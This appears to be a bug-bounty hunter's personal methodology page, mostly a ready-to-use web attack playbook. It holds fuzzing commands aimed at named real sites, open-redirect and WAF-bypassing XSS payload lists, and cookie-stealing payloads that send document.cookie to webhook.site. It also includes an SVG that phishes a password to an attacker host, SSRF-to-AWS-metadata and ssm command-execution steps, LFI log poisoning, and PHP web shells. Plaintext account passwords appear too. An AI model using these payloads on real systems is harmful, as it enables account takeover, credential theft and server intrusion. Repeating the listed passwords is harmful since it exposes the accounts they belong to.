💎My methodology

Find Wild card Scope like: *.target.com
Set domain scope(burpsuite).*.target.com$
Run subdomain.sh Script

curl -X GET "https://login.rbleipzig.com/en/sso/login?apiKey=4_htVHQTXwdHjOTKV1hr61rg" | grep -i -E 'location.href|location.search|window.location|window.hash|window.location.href|location.search|location.pathname|document.URL|getparam|getUelParameter|getParameter()|parameter|innerHTML|outerHTML|document.write|document.writeln|var ='

Find AllRegister and signup Foams for Open Redirect to Stealing User Session token

Open redirects in the login flow mostly have the session token or any other auth token in the query param.

inurl:register | intitle:register | inurl:signup | intitle:signup | intext:signin site:.who.int

Find thePersistent XSS in the Signup Process

in the name field: <img src=x onerror=alert(origin)> in the name field.

Credentials

hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123

Find theOpen Redirect in these components:
Sign in & register pages
Sign out endpoint
Email verification links
Profile account page
Password resets (inspect the generated token link too as it may contain a redirect parameter)

server-side redirects always use Location response header with 3XX status code If missing Location response header but still redirects (after a small delay), it DOM-based redirect

Run open-dork.sh Script

Check Server and client side redirect then Exploit Further

check Location Header

curl -I "https://www.target.com/redirect?url=https://www.example.com"
curl "https://account.cbg.nl/logout?redirect_uri=https://evil.com/" | grep -i -E 'location.href|window.location|window.location.href'

iflocation.href window.location window.location.href in DOMthen Check Open Redirect to XSS

javascript:alert(origin)
javascript:confirm(1);//

Open Redirect DOM XSS toAccount Take Over

javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookie

Find XSS Steps

1:FistFind tech based Subdomains withhttpx or Shodan or Google Dork like: PHP

Check Subdomains.sh to tech based Filters Domains
Check Ext-dork to tech based Filters Domains
Check Shodan-dork to tech based Filters Domains

2:ThenFind how many Subdomain used endpoint-extentionswith Google Dork or Wayback machine or roborts.txt or Fuzzing like PHP tech used endpoint-extensions: php,htm,html
Sort out AllSubdomain to used endpoint-extentionsand check one by one

Run ext-dork.sh Script with Specific Domain


dirsearch -w raft-medium-directories.txt -u https://xyz.example.com -e js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,pl --full-url --max-rate=5 -i 200

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,pl -w raft-small-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 5

ffuf -u https://www.kfc.co.uk/FUZZ -w common.txt -recursion -recursion-depth 4 -mc 200 -e .js,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.action,.pl -rate 50 -t 50

Check Hidden Paths inroborts.txt

httpx-toolkit -l livesubdomains.txt -paths /robots.txt -silent -o robots-url.txt && for url in $(cat robots-url.txt);do http -b $url | grep 'Disallow' | awk -F ' ' '{print $2}' | cut -c 2- | anew robot-words.txt;done

ffuf -u FUZZ/robots.txt -w livesubdomains.txt -mr "/INTERSHOP/"

3:ThenFind origin IPusing shodan,fofa For Endpoint BF and WafBypass

Run hostname:"mytoken.us.dell.com" Shodan
Run host:"mytoken.us.dell.com" Fofa
nslookup mytoken.us.dell.com

4:ThenFind vulnerable Endpointsof Both Domain and origin IP according to tech and endpoint-extention: with Fuzzing used ffuf or Dirsearsh like error.php, demo.html, test.htm

Run Fuzzing with FFUF
Run Fuzzing with Gobuster
Run Fuzzing with Dirsearch

5:Then find the vulnerable Parameterswith Arjun or x8like error.php?code=xss

Run Arjun
Run Parampp
Run x8 with parameters wordlist

6:Then confirm html injection

arjun -i endpoint.txt -oT Arjun.txt && cat Arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss-check.txt && cat xss-check.txt | Gxss | httpx -sc && cat xss-check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-html-injection.txt

7:Then confirm Reflected XSS

cat xss-check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txt

8:Find XSS Vulnerable Endpoint in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

9:Reflected XSS toAccount Take Over

https://xss.report/dashboard swagpk Synack@3434
https://bxsshunter.com/dashboard Synack@3434

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

10:Then confirmSQL injection

while read url; do
    echo "Testing URL: $url"
    yes n | ghauri -u "$url" --dbs --banner --current-db --level 3
done < arjun.txt

ghauri -u https://www.webucate.in/page-category_freeTestSeries.php?catId=42&subCatId=63 --random-agent -v3 --level=3 risk=3

11:Then confirmOpen Redirect

cat xss-check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -location

cat xss-check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location

12:Then confirm Local file inclusion (LFI)

echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"

echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done

---------------------------------------------------------------------

echo 'https://be.elementor.com/visit/?bta=13693&brand=elementor&landingPage=' | httpx -paths op.txt -threads 50 -random-agent -sc -location

URL Decode and Encode - OnlineURL Decode

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Open Redirect Cheat SheetPentester Land

Bypass via encoding

https://evil.com
https://%09/evil.com
http%3A%2F%2Fwww.google.com
https%3A%2F%2Fwww.google.com%2F
https://www%2Egoogle%2Ecom
https://www%252Egoogle%252Ecom
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
%68%74%74%70%3a%2f%2fevil.com
/%0D/evil%25%32%65com
%40evil.com/
%2F%2Fevil.com
%2F%2F%2F%2Fhackerone.com

Bypass filter

//evil.com
///evil.com/
////evil.com
/%0d/evil.com
/%09/evil.com
/%0A/evil.com
/%0D/evil.com
/%09/evil.com
/+/evil.com
/\evil.com/
\\evil.com\
/..//evil.com
http:///evil.com/
@www.bing.com
.evil.com
https:evil.com
https;evil.com
https:\/\/evil.com
https:/\/\evil.com
https:\\evil.com

Bypass whitelist

target.com%40evil.com
https://target.com%5C%5C@google.com/
https://evil.com%5C%40www.example.com
https://target.com@evil.com/
https://target.com/@evil.com
https://evil.com\@target.com
https://target.com.bing.com/
https://target.com?bing.com
https://target.com°bing.com
https://target.com%23bing.com
https://target.com%00bing.com
https://target.com%0Abing.com
https://target.com%0Dbing.com
https://target.com%0Dbing.com
https://target.com%09bing.com
/%0d/evil.com/
https://evil.com\\.target.com/
https://evil.com%E3%80%82%23.target.com/
https://target.com%00https://evil.com/
https://website.com/http://evil.com/
http://evil.com?vimeocdn.com/
https://attacker.com%E3%80%82example.com   
?link=https://bing.com?link=https://www.target.com/
?link=https://evil.com/?link=https://open.spreaker.com//https://evil.com
?Redirect=https:/www.target.com/login-redirect/?redirect=//any-domain.com

OAuth to Open-Redirect

https://auth.<company>/?next_url=https://www.<product>/login-redirect/?redirect=//any-domain.com?token=<TOKEN>
https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8

DOM XSS Check In Redirect Parameters

My Payloads

javascript:confirm(1);//
java%0d%0ascript%0d%0a:alert(document.domain)
javascript://%250Dtop.confirm?.(origin)//
javascript:%250Aalert(1)//
javascript:@evil.com
java%0D%0Ascript%0D%0A:alert(document.domain)
javascript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"

# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)

If Access token available In Redirect URL then Check Account take Over

j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookie

OR Check with Burp Collaborater And Webhook URL

Webhook.site - Test, transform and automate Web requests and emailswebhook.site

SSRF Check In Redirect OR Data Fetch and File Download Parameters

wfuzz -z range,0-65535 -u 'https://www.somaiya.edu.in/download.php?pdf_path=127.0.0.1:FUZZ'

python3 ssrfmap.py -r request.txt -p "url" -m readfiles,portscan

http://169.254.169.254/latest/meta-data/
http://169.254.169.254//latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/
file:///etc/passwd
file:///etc/shadow
file:///etc/shells
file:///etc/group
file:///etc/profile
file:///etc/hosts
file:///proc/self/environ
file:///proc/self/status
file:///proc/mounts
file:///proc/version
file:///bin/sh
file:///C:/Windows/win.ini
file:///web.config
file:///C:/windows/System32/drivers/etc/hosts
cat /e*c/p*s*d

if SSRF then check to Reflected XSS

Example: https://mop4.com/?url=https://brutelogic.com.br/poc.svg

Payload URL

https://brutelogic.com.br/poc.svg

if SSRF then check to RCE

1) Configure AWS CLI

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=us-west-1
export AWS_SESSION_TOKEN=

2) these Paths can be used to find the region
/latest/meta-data/placement/availability-zone
/latest/dynamic/instance-identity/document

3) aws sts get-caller-identity

4) aws s3 ls

5) aws ssm send-command --document-name "AWS-RunShellScript" --comment "AnyComment" --instance-ids="[Instance-id]" --parameters "commands=uname -a"

Blind XSS Check to Account take Over

Find File upload Vulnerabilities like: RCE-SXSS-SSRF-LFI

site:.who.int "choose file"
site:.who.int intext:"choose file" | inurl:"uploadform" 
site:.who.int inurl:"uploadform" 
site:.who.int inurl:"uploadform" filetype:asp

Check SVG File to Tacking it to Credentials Theft
Check SVG File to Stored XSS
Check Docx File to HTML
Check Docx File to SSRF
Check XSS in Reflected File Name
Check PHP Function to LFI
Check PHP Reverse Shell to RCE
Observe that which PHP RCE functions:popen(),system(), shell_exec(), passthuru() and file read functions like incluce(),require(),file_get_contents() were disabled and enabled this php Application
Craft Reverse Shell payload with that PHP function and save it into the file name shell.php if client-side validation to bypass it Shell.php.jpg
intercept the file upload request in burpsuite and removed the .jpg extension and forwarded the file upload request to the server.

PHP Pyload with that popen() PHP function:
---------
<?php$cmd = $_GET['cmd'];echo `$cmd`;?>
/uploadform/uploads/shell.php?code=echo%20%60id%60

PHP Pyload with that popen() PHP function:
---------
<?php system($_GET['$cmd']) ;?>  
/uploadform/uploads/shell.php?cmd='id'

jpg to xss

exiftool -Comment="\"><script>alert(prompt('XSS BY Asad'))</script>" xss.jpg

Svg to SXSS

# File Name Bypass: "Fileupload.svg.png”
# Change Content-Type: image/svg+xml

# Svg File Payload Uploaded Here :

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">

<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009901" stroke=”#004400"/>

<script type=”text/javascript”>
alert(document.cookie);
</script>
</svg>

Svg to Credentials Theft

# Tacking it to Credentials Theft by Modifying the Above Payload to:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

        <script> 
                var passwd = prompt("Enter your password to continue");
                var xhr = new XMLHttpRequest();
                xhr.open("GET","https://attacker-url.com/log.php?password="+encodeURI(passwd));
                xhr.send();
        </script>

</svg>

docx to htmi and ssrf

<h1>injected</h1>
<img src="file:///etc/hosts"/>

PHP to LFI

<?php
    $file = $_GET['file'];
    include($file);
?>

Burp Suite And Browser Setting for find XSS

Turn On Burp and Add to Scope
Turn on Burp Extensions to find Reflected XSS: 
Reflection + Reflector + isXSS +  HopLa + Hackbar + Reflection-Tracer
Turn on Crome Extention : Xnl Reveal
Turn on Crome Extention: Param Scan
Turn on Crome Extention: extractify
Turn on Crome Extention: input Hidden Moniter
Turn on Crome Extention: link Gopher and linkg rabber
Hunting for XSS: Set up filters in Burp Suite with Content-Type: text/html

Find Disallow Path for Fuzzing

site:dell.com inurl:robots.txt

Find Origin IP with Favicon hash for find Endpoints

cat livesubdomains.txt | httpx -favicon -j | jq -r .favicon | grep -v null | sort -u
http.favicon.hash:hash_number_here

Find Hidden Endpoints FOR Fuzzing

FUFF

recursion -recursion-depth 4
-rate 50 -t 50
-p 0.5-0.6 
-v -mc 200
-v -fc 401,403
-e .html,.htm
-e .php,.html,.htm
-e .asp,.aspx,.html,.htm
-e .jsp,.jspx,.do,.html,.htm,.action
-x "http://127.0.0.1:8080"
-s

Dirsearsh

--exclude-sizes 0B 
--recursive
--random-agent
--max-rate=
--full-url
--cookie=
-i 200
-x 401,403
-e html,htm
-e php,html,htm,js
-e asp,aspx,html,htm,js
-e jsp,jspx,do,html,htm,action,js
-e js,php,html,xhtml,htm,asp,aspx,ashx,asmx,cfm,jsp,jspx,do,action,pl

Find Hidden Parameters

python3 parampp.py -u https://press.zara.com/ECOMPressSite/error.html

cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '"><a href=https://bing.com>hacked' | tee -a confirm-xss.txt

cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '"><a href=https://bing.com>hacked' | tee -a confirm-xss.txt

Arjun

-c 500
-d 2
-t 10 -T 10
--stable 
--passive
-m POST
-oT arjun.txt
--disable-redirects 
--headers ‘Cookie: PHPSESSID=xxxx’

--reflected-only 
-X GET
-u 
-w
-v

Find XSS vulnerable Endpoint to check in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

Confirm Vulnerable Parameter for Html injection OR Reflected XSS

"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
'"><img src=x onerror=confirm(origin)>
"><svg onload=confirm(1)>
(confirm)(origin)
javascript:confirm(document.domain)
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe

XSS Payloads

### if Website Remove payloads Kaywords then used this Payloads:
<a/href=j&#97v&#97script&#x3A;&#97lert(origin)>ClickMe
"><a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>

Akamai WAF Bypasses...

';k='e'%0Atop['al'+k+'rt'](1)//
'><A HRef=' AutoFocus OnFocus=top//?.['ale'%2B'rt'](1)>
---------------------
CloudFlare WAF Bypasses...
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ev'%2B'al'](`imp\u00%36%66rt\u00%32%38'//X55.is'\u00%32%39`)>

<svg/onload=window['al'+'ert']1337>
<Svg Only=1 OnLoad=confirm(document.cookie)>
<svg onload=alert&#0000000040document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1//On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Img Src=OnXSS OnError=prompt(1337)>
<Img Src=OnXSS OnError=prompt(document.cookie)>
<Svg Only=1 OnLoad=confirm(atob('Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=='))>
---------------------
Cloudfront WAF Bypasses...

%2522%253E%253Csvg/onload=alert(origin)%253E
'>'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
'>%0D%0A%0D%0A<x '='foo'><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>'>
---------------------
ModSecurity WAF Bypasses...

Payloads designed to evade ModSecurity WAF rules
<svg onload='new Function['Y000!'].find(al\u0065rt)'>
---------------------
Imperva WAF Bypasses...

Advanced techniques for bypassing Imperva WAF protection
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter='location=javas+cript:ale+rt%2+81%2+9;//</div'>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle='propmt(document.cookie);'>
---------------------
Sucuri WAF Bypasses...

<A HREF='https://www.cia.gov/'>Click Here </A>
'><img src=x onerror=alert(document.cookie)>
<button onClick='prompt(1337)'>Submit</button>
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(1337)>ClickMe
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
<a href='j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://github.com/coffinxp';'>ClickMe</a>

Find Origin IP for Bypass WAF

hostname:".dell.com" http.component:php
hostname:".dell.com" http.component:java
hostname:".dell.com" http.component:ASP.NET

nslookup mytoken.us.dell.com

https://search.censys.io/
host="mytoken.us.dell.com"

https://en.fofa.info/
host="mytoken.us.dell.com"

https://www.shodan.io/search
hostname:"mytoken.us.dell.com"

curl -i url | head -n 15

Create and Customize XSS Payload According WAF and Regex

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

JSFiddle - Code Playgroundjsfiddle.net

RXSS to Account Take Over

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

Dork for finding Swagger DOM XSS

Google Dork

site:domain.com intext:"Swagger UI" | intitle:"Swagger UI"
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?url= 
site:domain.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl=

Shodan Dork

http.title:"Swagger UI" hostname:"domain.com"

?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

if GET Parameter Check for LFI and Path traversal

# "Running LFI Testing on gf lfi Parameters with httpx..."
echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"

# "Running LFI Testing on gf lfi Parameters with Fuff..."
echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done

LFI to RCE

User-Agent: <?php phpinfo(); ?>
User-Agent: <?php system('id'); ?>
User-Agent: <?php system('ls -lsa'); ?>
User-Agent: <?php echo system('env') ?>
User-Agent: <?php system($_GET['$cmd']) ?>  listner:URL/path/file=/etc/passwd&cmd='id'

logs files:
/var/www/logs/access.log
/var/log/apache/access.log
/etc/httpd/logs/acces_log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log

if GET Parameter Check for SQL injection

SQLMap Command Generatortaurusomar.github.io

SQLMap Command Generatoracorzo1983.github.io

PreviousMy Bash & Python Scripts NextMy Nuclei templates

Last updated 3 months ago